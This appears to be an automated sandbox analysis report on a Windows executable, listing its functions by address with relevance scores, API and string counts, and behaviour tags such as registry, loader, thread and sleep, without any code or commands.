Windows Analysis Report
r096teIe1H.exe

Function 0327D8B0 Relevance: 200.7, APIs: 12, Strings: 99, Instructions: 6431
COMMON

Function 03265A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 0327CBE8 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Function 03277B88 Relevance: 6.0, APIs: 4, Instructions: 32
nativeCOMMON

Function 03276DC0 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Function 03261724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Function 03261A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Function 03277C04 Relevance: 6.0, APIs: 4, Instructions: 49
libraryloaderCOMMON

Function 0326E348 Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Function 032770D4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Function 0326E3E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 03276D64 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Function 0326582C Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 03267E40 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Function 032874EC Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 032615CC Relevance: 1.3, APIs: 1, Instructions: 38
memoryCOMMON

Function 03261682 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMON

Function 032616E6 Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Function 0326415C Relevance: .1, Instructions: 57
COMMON

Function 0327A6F4 Relevance: 64.5, APIs: 16, Strings: 20, Instructions: 1543
librarynativeloaderCOMMON

Function 0327A0C8 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
libraryloaderCOMMON

Function 03277F54 Relevance: 43.9, APIs: 8, Strings: 16, Instructions: 1882
nativethreadprocessCOMMON

Function 032658CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139
stringlibraryfileCOMMON

Function 0327CFB0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 249
processnativesynchronizationCOMMON

Function 03265B9C Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Function 03277B14 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Function 0327CB04 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Function 0327CA74 Relevance: 4.5, APIs: 3, Instructions: 45
filenativeCOMMON

Function 03267FB6 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Function 0326A7A8 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Function 0326B770 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 0326A7F4 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Function 032691F0 Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Function 032620C4 Relevance: .1, Instructions: 94
COMMONCrypto

Function 0326D278 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Function 03262530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254
windowCOMMON

Function 0327A58C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102
libraryloaderCOMMON

Function 0327C24C Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 420
libraryloaderCOMMON

Function 0326252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188
COMMON

Function 0326BDA4 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Function 03264320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Function 0326AEA8 Relevance: 10.6, APIs: 7, Instructions: 56
filewindowCOMMON

Function 0326E570 Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Function 0326355C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Function 0326AA34 Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Function 0326AAE4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Function 032779BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23
libraryloaderCOMMON

Function 03277A50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22
libraryloaderCOMMON

Function 0326C458 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Function 03269AD0 Relevance: 6.4, Strings: 5, Instructions: 127
COMMON

Function 0326E1CC Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Function 0326AD20 Relevance: 6.1, APIs: 4, Instructions: 102
COMMON

Function 0326AD1E Relevance: 6.1, APIs: 4, Instructions: 101
COMMON